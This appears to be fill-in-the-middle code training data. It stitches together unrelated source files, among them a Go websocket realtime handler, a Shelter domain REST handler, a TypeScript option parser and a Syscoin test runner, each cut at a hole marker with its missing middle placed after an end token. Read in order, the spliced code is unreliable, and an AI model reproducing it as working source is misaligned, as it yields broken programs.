func authorized(i *instance.Instance, perms permission.Set, permType, id string) bool {
if perms.AllowWholeType(permission.GET, permType) {
return true
} else if id == "" {
return false
} else if permType == consts.Files {
fs := i.VFS()
dir, file, err := fs.DirOrFileByID(id)
if dir != nil {
err = vfs.Allows(fs, perms, permission.GET, dir)
} else if file != nil {
err = vfs.Allows(fs, perms, permission.GET, file)
}
return err == nil
} else {
return perms.AllowID(permission.GET, permType, id)
}
}
func readPump(ctx context.Context, c echo.Context, i *instance.Instance, ws *websocket.Conn,
ds *realtime.DynamicSubscriber, errc chan *wsError, withAuthentication bool) {
defer close(errc)
var err error
var pdoc *permission.Permission
if withAuthentication {
var auth map[string]string
if err = ws.ReadJSON(&auth); err != nil {
sendErr(ctx, errc, unknownMethod(auth["method"], auth))
return
}
if strings.ToUpper(auth["method"]) != "AUTH" {
sendErr(ctx, errc, unknownMethod(auth["method"], auth))
return
}
if auth["payload"] == "" {
sendErr(ctx, errc, unauthorized(auth))
return
}
pdoc, err = middlewares.ParseJWT(c, i, auth["payload"])
if err != nil {
sendErr(ctx, errc, unauthorized(auth))
return
}
}
for {
cmd := &command{}
if err = ws.ReadJSON(cmd); err != nil {
if websocket.IsUnexpectedCloseError(err, websocket.CloseGoingAway, websocket.CloseNoStatusReceived) {
logger.
WithDomain(ds.DomainName()).
WithField("nspace", "realtime").
Debugf("Error: %s", err)
}
break
}
method := strings.ToUpper(cmd.Method)
if method != "SUBSCRIBE" && method != "UNSUBSCRIBE" {
sendErr(ctx, errc, unknownMethod(cmd.Method, cmd))
continue
}
if cmd.Payload.Type == "" {
sendErr(ctx, errc, missingType(cmd))<|fim▁hole|> continue
}
permType := cmd.Payload.Type
		// XXX: thumbnails is a synthetic doctype; listening to its events
		// requires a permission on io.cozy.files. Same for note events.
if permType == consts.Thumbnails || permType == consts.NotesEvents {
permType = consts.Files
}
// XXX: no permissions are required for io.cozy.sharings.initial_sync
// and io.cozy.auth.confirmations
if withAuthentication &&
cmd.Payload.Type != consts.SharingsInitialSync &&
cmd.Payload.Type != consts.AuthConfirmations {
if !authorized(i, pdoc.Permissions, permType, cmd.Payload.ID) {
sendErr(ctx, errc, forbidden(cmd))
continue
}
}
if method == "SUBSCRIBE" {
if cmd.Payload.ID == "" {
err = ds.Subscribe(cmd.Payload.Type)
} else {
err = ds.Watch(cmd.Payload.Type, cmd.Payload.ID)
}
} else if method == "UNSUBSCRIBE" {
if cmd.Payload.ID == "" {
err = ds.Unsubscribe(cmd.Payload.Type)
} else {
err = ds.Unwatch(cmd.Payload.Type, cmd.Payload.ID)
}
}
if err != nil {
logger.
WithDomain(ds.DomainName()).
WithField("nspace", "realtime").
Warnf("Error: %s", err)
}
}
}
// Ws is the API handler for realtime via a websocket connection.
func Ws(c echo.Context) error {
var db prefixer.Prefixer
// The realtime webservice can be plugged in a context without instance
// fetching. For instance in the administration server. In such case, we do
// not need authentication
inst, withAuthentication := middlewares.GetInstanceSafe(c)
if !withAuthentication {
db = prefixer.GlobalPrefixer
} else {
db = inst
}
ws, err := upgrader.Upgrade(c.Response(), c.Request(), nil)
if err != nil {
return err
}
defer ws.Close()
ws.SetReadLimit(maxMessageSize)
if err = ws.SetReadDeadline(time.Now().Add(pongWait)); err != nil {
return nil
}
ws.SetPongHandler(func(string) error {
return ws.SetReadDeadline(time.Now().Add(pongWait))
})
ds := realtime.GetHub().Subscriber(db)
defer ds.Close()
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
errc := make(chan *wsError)
go readPump(ctx, c, inst, ws, ds, errc, withAuthentication)
ticker := time.NewTicker(pingPeriod)
defer ticker.Stop()
for {
select {
case e, ok := <-errc:
if !ok { // Websocket has been closed by the client
return nil
}
if err := ws.SetWriteDeadline(time.Now().Add(writeWait)); err != nil {
return nil
}
if err := ws.WriteJSON(e); err != nil {
return nil
}
case e := <-ds.Channel:
if err := ws.SetWriteDeadline(time.Now().Add(writeWait)); err != nil {
return err
}
res := wsResponse{
Event: e.Verb,
Payload: wsResponsePayload{
Type: e.Doc.DocType(),
ID: e.Doc.ID(),
Doc: e.Doc,
},
}
if err := ws.WriteJSON(res); err != nil {
return nil
}
case <-ticker.C:
if err := ws.SetWriteDeadline(time.Now().Add(writeWait)); err != nil {
return err
}
if err := ws.WriteMessage(websocket.PingMessage, []byte{}); err != nil {
return nil
}
}
}
}
// Notify is the API handler for POST /realtime/:doctype/:id: this route can be
// used to send documents in the real-time without having to persist them in
// CouchDB.
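// An illustrative call (doctype and id assumed):
//   POST /realtime/io.cozy.myapp.events/some-id
// with a JSON body broadcasts that document to subscribers without persisting it.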
func Notify(c echo.Context) error {
inst := middlewares.GetInstance(c)
doctype := c.Param("doctype")
id := c.Param("id")
if err := permission.CheckReadable(doctype); err != nil {
return jsonapi.BadRequest(err)
}
var payload couchdb.JSONDoc
if err := c.Bind(&payload); err != nil {
return jsonapi.BadRequest(err)
}
payload.SetID(id)
payload.Type = doctype
if err := middlewares.Allow(c, permission.POST, &payload); err != nil {
return err
}
realtime.GetHub().Publish(inst, realtime.EventNotify, &payload, nil)
return c.NoContent(http.StatusNoContent)
}
// Routes set the routing for the realtime service
func Routes(router *echo.Group) {
router.GET("/", Ws)
router.POST("/:doctype/:id", Notify)
}<|fim▁end|> | |
<|file_name|>app.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import imp
import os
import sys
PYCART_DIR = ''.join(['python-', '.'.join(map(str, sys.version_info[:2]))])
try:
zvirtenv = os.path.join(os.environ['OPENSHIFT_HOMEDIR'], PYCART_DIR,
'virtenv', 'bin', 'activate_this.py')
execfile(zvirtenv, dict(__file__ = zvirtenv) )
except IOError:
pass
def run_gevent_server(app, ip, port=8181):
from gevent.pywsgi import WSGIServer
WSGIServer((ip, port), app).serve_forever()
def run_simple_httpd_server(app, ip, port=8181):
from wsgiref.simple_server import make_server
make_server(ip, port, app).serve_forever()
#
# IMPORTANT: Put any additional includes below this line. If placed above this
# line, it's possible required libraries won't be in your searchable path
#
#
# main():
#
if __name__ == '__main__':<|fim▁hole|> # Use gevent if we have it, otherwise run a simple httpd server.
print 'Starting WSGIServer on %s:%d ... ' % (ip, port)
try:
run_gevent_server(zapp.application, ip, port)
except:
print 'gevent probably not installed - using default simple server ...'
run_simple_httpd_server(zapp.application, ip, port)<|fim▁end|> | ip = os.environ['OPENSHIFT_PYTHON_IP']
port = 8181
zapp = imp.load_source('application', 'wsgi/application')
|
<|file_name|>read_and_enrich.py<|end_file_name|><|fim▁begin|>import os
from HTMLParser import HTMLParser
from ConfigParser import NoOptionError
import nltk
from sentence import Sentence
from resources import Resources
from wordnet_cache import WordnetCache as Wordnet
class ReadAndEnrich(object):
def __init__(self, conf):
self.conf = conf
self.enricher = Enricher(conf)
self.pairs = []
def read_sentences(self, stream):
for sen1, sen2, tags1, tags2 in self.read_lines(stream):
s1 = self.enricher.add_sentence(sen1, tags1)
s2 = self.enricher.add_sentence(sen2, tags2)
self.pairs.append((s1, s2))
return self.pairs
def clear_pairs(self):
self.pairs = []
def read_lines(self, stream):
enc = self.conf.get('global', 'encoding')
for l in stream:
fs = l.decode(enc).strip().split('\t')
if len(fs) == 2:
sen1 = fs[0]
sen2 = fs[1]
yield sen1, sen2, None, None
elif len(fs) == 6:
sen1 = fs[2]
sen2 = fs[3]
tags1 = fs[4]
tags2 = fs[5]
yield sen1, sen2, tags1, tags2
elif len(fs) == 7:
sen1 = fs[2]
sen2 = fs[3]
tags1 = fs[5]
tags2 = fs[6]
yield sen1, sen2, tags1, tags2
class Enricher(object):
def __init__(self, conf):
self.conf = conf
self.sentences = {}
if self.conf.get('global', 'tokenizer') == 'sts':
self.html_parser = HTMLParser()
self.hunpos = self.init_hunpos()
def init_hunpos(self):
hunpos_dir = self.conf.get('global', 'hunpos_dir')
hunpos_binary = os.path.join(hunpos_dir, 'hunpos-tag')
hunpos_model = os.path.join(hunpos_dir, 'en_wsj.model')
return nltk.tag.HunposTagger(hunpos_model, hunpos_binary)
def add_sentence(self, sentence, tags):
        if hash(sentence) not in self.sentences:
tokens = self.tokenize_and_tag(sentence, tags)
# filter tokens if the config option remove_stopwords
# and/or remove_punctuation is set
filt_tokens = self.filter_tokens(tokens)
self.add_wordnet_senses(filt_tokens)
s = Sentence(sentence, filt_tokens)
self.sentences[hash(s)] = s
return self.sentences[hash(sentence)]
def add_wordnet_senses(self, tokens):
for token in tokens:
if self.conf.getboolean('wordnet', 'enrich_with_senses'):
token['senses'] = Wordnet.get_senses(token['token'], self.conf.getint('wordnet', 'sense_threshold'))
else:
token['senses'] = set([token['token']])
def filter_tokens(self, tokens):
new_tok = []
for token in tokens:
word = token['token']
if self.conf.getboolean('global', 'remove_stopwords') and word in Resources.stopwords:
continue
if self.conf.getboolean('global', 'remove_punctuation') and word in Resources.punctuation:
continue
if self.conf.getboolean('global', 'filter_frequent_adverbs') and Resources.is_frequent_adverb(word, token['pos']):
continue
new_tok.append(token)
return new_tok
def tokenize_and_tag(self, sentence, tags):
tokens = [{'token': t} for t in self.tokenize(sentence)]
if tags:
self.parse_tags(tokens, tags)
else:
if self.conf.get('global', 'tokenizer') == 'sts':
self.tag_tokens(tokens)
else:
self.dummy_tag_tokens(tokens)
if self.conf.getboolean('global', 'lower'):
for t in tokens:
t['token'] = t['token'].lower()
return tokens
def tokenize(self, sentence):
tok_method = self.conf.get('global', 'tokenizer')
if tok_method == 'simple':
return sentence.split(' ')
if tok_method == 'sts':
return self.sts_tokenize(sentence)
def sts_tokenize(self, sentence):
tokens = nltk.word_tokenize(self.html_parser.unescape(sentence))
toks = []
for tok in tokens:
if tok in Resources.punctuation:
toks.append(tok)
else:<|fim▁hole|>
def parse_tags(self, tokens, tags_str):
# match tags with tokens and skip tags if a token
# is missing (it was filtered by the tokenizer)
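        # each whitespace-separated tag has the form token/NER/POS/chunk,
        # e.g. "Paris/LOCATION/NNP/B-NP" (example values assumed)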
i = 0
for t in tags_str.split():
sp = t.split('/')
if not sp[0] == tokens[i]['token']:
continue
tokens[i]['ner'] = sp[1]
tokens[i]['pos'] = sp[2]
tokens[i]['chunk'] = sp[3]
i += 1
def dummy_tag_tokens(self, tokens):
for t in tokens:
t['pos'] = ''
t['ner'] = ''
t['chunk'] = ''
def tag_tokens(self, tokens):
words = [i['token'] for i in tokens]
pos_tags = self.hunpos.tag(words)
if self.conf.getboolean('penalty', 'penalize_named_entities'):
ne = nltk.ne_chunk(pos_tags)
ner_tags = self.get_ner_tags(ne)
else:
ner_tags = ['' for _ in range(len(tokens))]
for i, tag in enumerate(pos_tags):
tokens[i]['pos'] = tag
tokens[i]['ner'] = ner_tags[i]
def get_ner_tags(self, ne):
tags = []
for piece in ne:
if isinstance(piece, tuple):
tok, pos = piece
tags.append((pos, 'o'))
else:
ne_type = piece.label()
tags.append((piece[0][1], 'b-{0}'.format(ne_type)))
tags += [(tok[1], 'i-{0}'.format(ne_type)) for tok in piece[1:]]
return tags<|fim▁end|> | toks += Resources.punct_re.split(tok)
return filter(lambda x: x not in ('', 's'), toks) |
<|file_name|>domain.go<|end_file_name|><|fim▁begin|>// Copyright 2014 Rafael Dantas Justo. All rights reserved.
// Use of this source code is governed by a GPL
// license that can be found in the LICENSE file.
// Package handler store the REST handlers of specific URI
package handler
import (
"github.com/rafaeljusto/shelter/Godeps/_workspace/src/github.com/rafaeljusto/handy"
"github.com/rafaeljusto/shelter/Godeps/_workspace/src/gopkg.in/mgo.v2"
"github.com/rafaeljusto/shelter/dao"
"github.com/rafaeljusto/shelter/log"
"github.com/rafaeljusto/shelter/model"
"github.com/rafaeljusto/shelter/net/http/rest/interceptor"
"github.com/rafaeljusto/shelter/net/http/rest/messages"
"github.com/rafaeljusto/shelter/net/http/rest/protocol"
"net/http"
"strconv"
"strings"
"time"
)
func init() {
HandleFunc("/domain/{fqdn}", func() handy.Handler {
return new(DomainHandler)
})
}
// DomainHandler is responsable for keeping the state of a /domain/{fqdn} resource
type DomainHandler struct {
handy.DefaultHandler // Inject the HTTP methods that this resource does not implement
database *mgo.Database // Database connection of the MongoDB session
databaseSession *mgo.Session // MongoDB session
domain model.Domain // Domain object related to the resource
language *messages.LanguagePack // User preferred language based on HTTP header
FQDN string `param:"fqdn"` // FQDN defined in the URI
Request protocol.DomainRequest `request:"put"` // Domain request sent by the user
Response *protocol.DomainResponse `response:"get"` // Domain response sent back to the user
Message *protocol.MessageResponse `error` // Message on error sent to the user
}
func (h *DomainHandler) SetDatabaseSession(session *mgo.Session) {
h.databaseSession = session
}
func (h *DomainHandler) GetDatabaseSession() *mgo.Session {
return h.databaseSession
}
func (h *DomainHandler) SetDatabase(database *mgo.Database) {
h.database = database
}
func (h *DomainHandler) GetDatabase() *mgo.Database {
return h.database
}
func (h *DomainHandler) SetFQDN(fqdn string) {
h.FQDN = fqdn
}
func (h *DomainHandler) GetFQDN() string {
return h.FQDN
}
func (h *DomainHandler) SetDomain(domain model.Domain) {
h.domain = domain
}
func (h *DomainHandler) GetLastModifiedAt() time.Time {
return h.domain.LastModifiedAt
}
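// GetETag exposes the domain revision as the HTTP ETag, so the HTTP cache
// interceptor can answer conditional requests and detect concurrent updates.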
func (h *DomainHandler) GetETag() string {
return strconv.Itoa(h.domain.Revision)
}
func (h *DomainHandler) SetLanguage(language *messages.LanguagePack) {
h.language = language
}
func (h *DomainHandler) GetLanguage() *messages.LanguagePack {
return h.language
}
func (h *DomainHandler) MessageResponse(messageId string, roid string) error {
var err error
h.Message, err = protocol.NewMessageResponse(messageId, roid, h.language)
return err
}
func (h *DomainHandler) ClearResponse() {
h.Response = nil
}
func (h *DomainHandler) Get(w http.ResponseWriter, r *http.Request) {
h.retrieveDomain(w, r)
}
func (h *DomainHandler) Head(w http.ResponseWriter, r *http.Request) {
h.retrieveDomain(w, r)
}
// The HEAD method is identical to GET except that the server MUST NOT return a message-
// body in the response. Here the responsibility for not adding the body lies with the
// mux while writing the response.
func (h *DomainHandler) retrieveDomain(w http.ResponseWriter, r *http.Request) {
w.Header().Add("ETag", h.GetETag())
w.Header().Add("Last-Modified", h.GetLastModifiedAt().Format(time.RFC1123))
w.WriteHeader(http.StatusOK)
domainResponse := protocol.ToDomainResponse(h.domain, true)
h.Response = &domainResponse
}
func (h *DomainHandler) Put(w http.ResponseWriter, r *http.Request) {
// We need to set the FQDN in the domain request object because it is sent only in the
	// URI and not in the domain request body, to avoid information redundancy
h.Request.FQDN = h.GetFQDN()
var err error
if h.domain, err = protocol.Merge(h.domain, h.Request); err != nil {
messageId := ""
switch err {
case model.ErrInvalidFQDN:
messageId = "invalid-fqdn"
case protocol.ErrInvalidDNSKEY:
messageId = "invalid-dnskey"
case protocol.ErrInvalidDSAlgorithm:
messageId = "invalid-ds-algorithm"<|fim▁hole|> messageId = "invalid-ip"
case protocol.ErrInvalidLanguage:
messageId = "invalid-language"
}
if len(messageId) == 0 {
log.Println("Error while merging domain objects for create or "+
"update operation. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
} else {
if err := h.MessageResponse(messageId, r.URL.RequestURI()); err == nil {
w.WriteHeader(http.StatusBadRequest)
} else {
log.Println("Error while writing response. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
}
}
return
}
domainDAO := dao.DomainDAO{
Database: h.GetDatabase(),
}
if err := domainDAO.Save(&h.domain); err != nil {
if strings.Index(err.Error(), "duplicate key error index") != -1 {
if err := h.MessageResponse("conflict", r.URL.RequestURI()); err == nil {
w.WriteHeader(http.StatusConflict)
} else {
log.Println("Error while writing response. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
}
} else {
log.Println("Error while saving domain object for create or "+
"update operation. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
}
return
}
w.Header().Add("ETag", h.GetETag())
w.Header().Add("Last-Modified", h.GetLastModifiedAt().Format(time.RFC1123))
if h.domain.Revision == 1 {
w.Header().Add("Location", "/domain/"+h.domain.FQDN)
w.WriteHeader(http.StatusCreated)
} else {
w.WriteHeader(http.StatusNoContent)
}
}
func (h *DomainHandler) Delete(w http.ResponseWriter, r *http.Request) {
domainDAO := dao.DomainDAO{
Database: h.GetDatabase(),
}
if err := domainDAO.Remove(&h.domain); err != nil {
log.Println("Error while removing domain object. Details:", err)
w.WriteHeader(http.StatusInternalServerError)
return
}
w.WriteHeader(http.StatusNoContent)
}
func (h *DomainHandler) Interceptors() handy.InterceptorChain {
return handy.NewInterceptorChain().
Chain(new(interceptor.Permission)).
Chain(interceptor.NewFQDN(h)).
Chain(interceptor.NewValidator(h)).
Chain(interceptor.NewDatabase(h)).
Chain(interceptor.NewDomain(h)).
Chain(interceptor.NewHTTPCacheBefore(h)).
Chain(interceptor.NewJSONCodec(h))
}<|fim▁end|> | case protocol.ErrInvalidDSDigestType:
messageId = "invalid-ds-digest-type"
case protocol.ErrInvalidIP: |
<|file_name|>shell.js<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public<|fim▁hole|> * License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
gTestsubsuite = 'Exceptions';<|fim▁end|> | |
<|file_name|>webpack.dev.config.js<|end_file_name|><|fim▁begin|>const path = require('path')
const HtmlWebpackPlugin = require('html-webpack-plugin')
module.exports = {
context: path.resolve(__dirname, '../src'),
entry: './index.js',
output: {
path: path.resolve(__dirname, '../dist'),
filename: 'index.js'
},<|fim▁hole|> module: {
rules: [
{
test: /\.san$/,
use: 'san-loader'
},
{
test: /\.js$/,
use: 'babel-loader',
exclude: /node_modules/
},
{
test: /\.css$/,
use: ['style-loader', 'css-loader']
},
{
test: /\.(png|jpe?g|gif|svg)(\?.*)?$/,
use: 'url-loader'
},
{
test: /\.(woff2?|eot|ttf)(\?.*)?$/,
use: 'url-loader'
}
]
},
resolve: {
alias: {
'@': path.resolve(__dirname, '../src')
}
},
plugins: [
new HtmlWebpackPlugin({
template: path.resolve(__dirname, '../src/template.html')
})
]
}<|fim▁end|> | |
<|file_name|>JUMISkinDeformer.java<|end_file_name|><|fim▁begin|>/*
* (C) Copyright 2015 Richard Greenlees
*
* Permission is hereby granted, free of charge, to any person obtaining a copy of this software
* and associated documentation files (the "Software"), to deal in the Software without restriction,
* including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* 1) The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
<|fim▁hole|> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
*/
package com.jumi.scene.objects;
/**
*
* @author RGreenlees
*/
public class JUMISkinDeformer {
String name;
public JUMISubDeformer[] deformers = new JUMISubDeformer[0];
public JUMISkinDeformer(String inName) {
name = inName;
}
public String toString() {
String result = "Skin Deformer " + name + ":";
for (int i = 0; i < deformers.length; i++) {
result = result + "\n\t" + deformers[i].name;
}
return result;
}
public JUMISubDeformer getSubDeformerByIndex(int index) {
if (index >= deformers.length) {
return null;
}
return deformers[index];
}
public JUMISubDeformer getSubDeformerByName(String inName) {
for (JUMISubDeformer a : deformers) {
if (a.name.equals(inName)) {
return a;
}
}
return null;
}
}<|fim▁end|> | |
<|file_name|>commandLineParser.ts<|end_file_name|><|fim▁begin|>/// <reference path="sys.ts"/>
/// <reference path="types.ts"/>
/// <reference path="core.ts"/>
/// <reference path="scanner.ts"/>
module ts {
var shortOptionNames: Map<string> = {
"d": "declaration",
"h": "help",
"m": "module",
"o": "out",
"t": "target",
"v": "version",
};
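    // e.g. "-t es5" on the command line is treated as "--target es5".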
var options: CommandLineOption[] = [ //AR: curious why no error for rest cases, only for two cases where type was a record
{ name: "charset", type: "string" },
{ name: "codepage", type: "number" },
{ name: "declaration", type: "boolean" },
{ name: "diagnostics", type: "boolean" },
{ name: "help", type: "boolean" },
{ name: "locale", type: "string" },
{ name: "mapRoot", type: "string" },
{ name: "module", type: <any> { "commonjs": ModuleKind.CommonJS, "amd": ModuleKind.AMD }, error: Diagnostics.Argument_for_module_option_must_be_commonjs_or_amd },
{ name: "noImplicitAny", type: "boolean" },
{ name: "noLib", type: "boolean" },
{ name: "noLibCheck", type: "boolean" },
{ name: "noResolve", type: "boolean" },
{ name: "out", type: "string" },
{ name: "outDir", type: "string" },
{ name: "removeComments", type: "boolean" },
{ name: "sourceMap", type: "boolean" },
{ name: "sourceRoot", type: "string" },
{ name: "target", type: <any> { "es3": ScriptTarget.ES3, "es5": ScriptTarget.ES5 }, error: Diagnostics.Argument_for_target_option_must_be_es3_or_es5 },
{ name: "version", type: "boolean" }
];
// Map command line switches to compiler options' property descriptors. Keys must be lower case spellings of command line switches.
// The 'name' property specifies the property name in the CompilerOptions type. The 'type' property specifies the type of the option.
var optionDeclarations: Map<CommandLineOption> = {};
forEach(options, option => {
optionDeclarations[option.name.toLowerCase()] = option;
});
export function parseCommandLine(commandLine: string[]): ParsedCommandLine {
// Set default compiler option values
var options: CompilerOptions = {
target: ScriptTarget.ES3,
module: ModuleKind.None
};
var filenames: string[] = [];
var errors: Diagnostic[] = [];
parseStrings(commandLine);
return {
options: options,
filenames: filenames,
errors: errors
};
function parseStrings(args: string[]) {
var i = 0;
while (i < args.length) {
var s = args[i++];
if (s.charCodeAt(0) === CharacterCodes.at) {
parseResponseFile(s.slice(1));
}
else if (s.charCodeAt(0) === CharacterCodes.minus) {
s = s.slice(s.charCodeAt(1) === CharacterCodes.minus ? 2 : 1).toLowerCase();
// Try to translate short option names to their full equivalents.
if (hasProperty(shortOptionNames, s)) {
s = shortOptionNames[s];
}
if (hasProperty(optionDeclarations, s)) {
var opt = optionDeclarations[s];
// Check to see if no argument was provided (e.g. "--locale" is the last command-line argument).
if (!args[i] && opt.type !== "boolean") {
errors.push(createCompilerDiagnostic(Diagnostics.Compiler_option_0_expects_an_argument, opt.name));
}
<|fim▁hole|> case "number":
options[opt.name] = parseInt(args[i++]);
break;
case "boolean":
options[opt.name] = true;
break;
case "string":
options[opt.name] = args[i++] || "";
break;
// If not a primitive, the possible types are specified in what is effectively a map of options.
default:
var value = (args[i++] || "").toLowerCase();
//if (hasProperty(opt.type, value)) { //AR: this is not an IndexMap and hasOwnProperty will induce a checkAndTag to IndexMap
if (opt.type.hasOwnProperty(value)) {
options[opt.name] = opt.type[value];
}
else {
errors.push(createCompilerDiagnostic(opt.error));
}
}
}
else {
errors.push(createCompilerDiagnostic(Diagnostics.Unknown_compiler_option_0, s));
}
}
else {
filenames.push(s);
}
}
}
function parseResponseFile(filename: string) {
var text = sys.readFile(filename);
if (!text) {
errors.push(createCompilerDiagnostic(Diagnostics.File_0_not_found, filename));
return;
}
var args: string[] = [];
var pos = 0;
while (true) {
while (pos < text.length && text.charCodeAt(pos) <= CharacterCodes.space) pos++;
if (pos >= text.length) break;
var start = pos;
if (text.charCodeAt(start) === CharacterCodes.doubleQuote) {
pos++;
while (pos < text.length && text.charCodeAt(pos) !== CharacterCodes.doubleQuote) pos++;
if (pos < text.length) {
args.push(text.substring(start + 1, pos));
pos++;
}
else {
errors.push(createCompilerDiagnostic(Diagnostics.Unterminated_quoted_string_in_response_file_0, filename));
}
}
else {
while (text.charCodeAt(pos) > CharacterCodes.space) pos++;
args.push(text.substring(start, pos));
}
}
parseStrings(args);
}
}
}<|fim▁end|> |
switch (opt.type) {
|
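# A rough Python analogue of the option-parsing row above (option names
# mirror a few entries from the compiler's table; the logic is a simplified
# sketch, not the real parser): translate short switches to full names,
# then dispatch on each option's declared type.
SHORT_NAMES = {"o": "out", "t": "target"}
DECLARATIONS = {"out": str, "declaration": bool, "codepage": int}

def parse_command_line(args):
    options, filenames, errors = {}, [], []
    i = 0
    while i < len(args):
        s = args[i]
        i += 1
        if s.startswith("-"):
            name = s.lstrip("-").lower()
            name = SHORT_NAMES.get(name, name)   # expand short option names
            decl = DECLARATIONS.get(name)
            if decl is None:
                errors.append("unknown compiler option: " + name)
            elif decl is bool:
                options[name] = True             # boolean switches take no argument
            elif i < len(args):
                options[name] = decl(args[i])
                i += 1
            else:
                errors.append("option --" + name + " expects an argument")
        else:
            filenames.append(s)
    return options, filenames, errors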
<|file_name|>syscoin-util-test.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
# Copyright 2014 BitPay Inc.
# Copyright 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test framework for syscoin utils.
Runs automatically during `make check`.
Can also be run manually."""
import argparse
import binascii
import configparser
import difflib
import json
import logging
import os
import pprint
import subprocess
import sys
def main():
config = configparser.ConfigParser()
config.optionxform = str
config.read_file(open(os.path.join(os.path.dirname(__file__), "../config.ini"), encoding="utf8"))
env_conf = dict(config.items('environment'))
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
verbose = args.verbose
if verbose:
level = logging.DEBUG
else:
level = logging.ERROR
formatter = '%(asctime)s - %(levelname)s - %(message)s'
# Add the format/level to the logger
logging.basicConfig(format=formatter, level=level)
bctester(os.path.join(env_conf["SRCDIR"], "test", "util", "data"), "syscoin-util-test.json", env_conf)
def bctester(testDir, input_basename, buildenv):
""" Loads and parses the input file, runs all tests and reports results"""
input_filename = os.path.join(testDir, input_basename)
raw_data = open(input_filename, encoding="utf8").read()<|fim▁hole|> for testObj in input_data:
try:
bctest(testDir, testObj, buildenv)
logging.info("PASSED: " + testObj["description"])
except:
logging.info("FAILED: " + testObj["description"])
failed_testcases.append(testObj["description"])
if failed_testcases:
error_message = "FAILED_TESTCASES:\n"
error_message += pprint.pformat(failed_testcases, width=400)
logging.error(error_message)
sys.exit(1)
else:
sys.exit(0)
def bctest(testDir, testObj, buildenv):
"""Runs a single test, comparing output and RC to expected output and RC.
Raises an error if input can't be read, executable fails, or output/RC
are not as expected. Error is caught by bctester() and reported.
"""
# Get the exec names and arguments
execprog = os.path.join(buildenv["BUILDDIR"], "src", testObj["exec"] + buildenv["EXEEXT"])
execargs = testObj['args']
execrun = [execprog] + execargs
# Read the input data (if there is any)
stdinCfg = None
inputData = None
if "input" in testObj:
filename = os.path.join(testDir, testObj["input"])
inputData = open(filename, encoding="utf8").read()
stdinCfg = subprocess.PIPE
# Read the expected output data (if there is any)
outputFn = None
outputData = None
outputType = None
if "output_cmp" in testObj:
outputFn = testObj['output_cmp']
outputType = os.path.splitext(outputFn)[1][1:] # output type from file extension (determines how to compare)
try:
outputData = open(os.path.join(testDir, outputFn), encoding="utf8").read()
except:
logging.error("Output file " + outputFn + " can not be opened")
raise
if not outputData:
logging.error("Output data missing for " + outputFn)
raise Exception
if not outputType:
logging.error("Output file %s does not have a file extension" % outputFn)
raise Exception
# Run the test
proc = subprocess.Popen(execrun, stdin=stdinCfg, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
try:
outs = proc.communicate(input=inputData)
except OSError:
logging.error("OSError, Failed to execute " + execprog)
raise
if outputData:
data_mismatch, formatting_mismatch = False, False
# Parse command output and expected output
try:
a_parsed = parse_output(outs[0], outputType)
except Exception as e:
logging.error('Error parsing command output as %s: %s' % (outputType, e))
raise
try:
b_parsed = parse_output(outputData, outputType)
except Exception as e:
logging.error('Error parsing expected output %s as %s: %s' % (outputFn, outputType, e))
raise
# Compare data
if a_parsed != b_parsed:
logging.error("Output data mismatch for " + outputFn + " (format " + outputType + ")")
data_mismatch = True
# Compare formatting
if outs[0] != outputData:
error_message = "Output formatting mismatch for " + outputFn + ":\n"
error_message += "".join(difflib.context_diff(outputData.splitlines(True),
outs[0].splitlines(True),
fromfile=outputFn,
tofile="returned"))
logging.error(error_message)
formatting_mismatch = True
assert not data_mismatch and not formatting_mismatch
# Compare the return code to the expected return code
wantRC = 0
if "return_code" in testObj:
wantRC = testObj['return_code']
if proc.returncode != wantRC:
logging.error("Return code mismatch for " + outputFn)
raise Exception
if "error_txt" in testObj:
want_error = testObj["error_txt"]
# Compare error text
# TODO: ideally, we'd compare the strings exactly and also assert
        # that stderr is empty if no errors are expected. However, syscoin-tx
        # emits DISPLAY errors when running as a Windows application on
        # Linux through Wine. Just assert that the expected error text appears
        # somewhere in stderr.
if want_error not in outs[1]:
logging.error("Error mismatch:\n" + "Expected: " + want_error + "\nReceived: " + outs[1].rstrip())
raise Exception
def parse_output(a, fmt):
"""Parse the output according to specified format.
Raise an error if the output can't be parsed."""
if fmt == 'json': # json: compare parsed data
return json.loads(a)
elif fmt == 'hex': # hex: parse and compare binary data
return binascii.a2b_hex(a.strip())
else:
raise NotImplementedError("Don't know how to compare %s" % fmt)
if __name__ == '__main__':
main()<|fim▁end|> | input_data = json.loads(raw_data)
failed_testcases = []
|
<|file_name|>ProtocolDetector.java<|end_file_name|><|fim▁begin|>package org.ovirt.engine.core.bll.transport;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import org.ovirt.engine.core.bll.Backend;
import org.ovirt.engine.core.common.businessentities.VDS;
import org.ovirt.engine.core.common.businessentities.VdsProtocol;
import org.ovirt.engine.core.common.businessentities.VdsStatic;
import org.ovirt.engine.core.common.config.Config;
import org.ovirt.engine.core.common.config.ConfigValues;
import org.ovirt.engine.core.common.interfaces.FutureVDSCall;
import org.ovirt.engine.core.common.vdscommands.FutureVDSCommandType;
import org.ovirt.engine.core.common.vdscommands.TimeBoundPollVDSCommandParameters;
import org.ovirt.engine.core.common.vdscommands.VDSReturnValue;
import org.ovirt.engine.core.dal.dbbroker.DbFacade;
import org.ovirt.engine.core.utils.transaction.TransactionMethod;
import org.ovirt.engine.core.utils.transaction.TransactionSupport;
